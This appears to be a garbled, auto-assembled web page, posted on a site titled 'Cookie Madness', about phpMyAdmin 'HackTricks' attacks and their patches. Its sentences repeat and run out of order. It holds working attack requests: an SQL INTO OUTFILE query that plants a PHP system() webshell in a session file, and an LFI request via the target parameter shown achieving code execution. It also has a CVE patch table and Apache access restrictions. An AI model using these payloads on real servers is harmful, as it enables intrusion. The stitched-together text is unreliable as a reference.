Cookie Madness

menu icon
subscribe
search icon

Phpmyadmin Hacktricks Patched ✪

However, a patch is not magic. It must be applied correctly, and defenses must be layered with network restrictions and file permissions. For a penetration tester, "patched" means moving on to another vector. For a system administrator, "patched" means security.

GET /index.php?target=db_sql.php%3f/../../../../../../tmp/sess_attacker HTTP/1.1 Result: uid=33(www-data) gid=33(www-data) – RCE achieved. phpmyadmin hacktricks patched

Introduction phpMyAdmin is the most popular database management tool on the web. Written in PHP, it provides a graphical interface for MySQL and MariaDB. Unfortunately, its ubiquity makes it a prime target for attackers. In the world of penetration testing and red teaming (often summarized as "HackTricks"), phpMyAdmin is a goldmine—capable of leading to Remote Code Execution (RCE) , Local File Inclusion (LFI) , SQL injection , and privilege escalation . However, a patch is not magic

POST /index.php?db=mysql&table=user HTTP/1.1 ... Content-Type: application/url-encoded sql_query=SELECT "<?php system('id'); ?>" INTO OUTFILE "/tmp/sess_attacker" For a system administrator, "patched" means security

# Move the folder mv /usr/share/phpmyadmin /var/www/html/secret_admin_92jsL # Update config accordingly | CVE | Affected Versions | HackTrick Technique | Patch Version | What the Patch Does | | --- | --- | --- | --- | --- | | CVE-2016-5734 | 4.0.0 - 4.6.2 | RCE via preg_replace /e | 4.6.3 | Removed /e modifier, sanitized column names | | CVE-2018-12613 | 4.8.0 | LFI to RCE via target param | 4.8.1 | Whitelisted target values, realpath validation | | CVE-2019-6799 | 4.8.0 - 4.8.5 | Arbitrary file upload via SQL file | 4.8.6 | MIME validation, rename uploaded files | | CVE-2020-26935 | 5.0.0 - 5.0.2 | SQL injection via db param | 5.0.3 | Escaped database names in _getSQLCondition() | | CVE-2022-23808 | 5.1.1 - 5.1.3 | XSS in transformation feature | 5.1.4 | Output encoding of transformation options |

<Location /phpmyadmin> Require ip 192.168.1.0/24 Require ip 10.0.0.0/8 Require ip 127.0.0.1 Deny from all </Location> Add an extra layer of Basic Auth before phpMyAdmin's login page.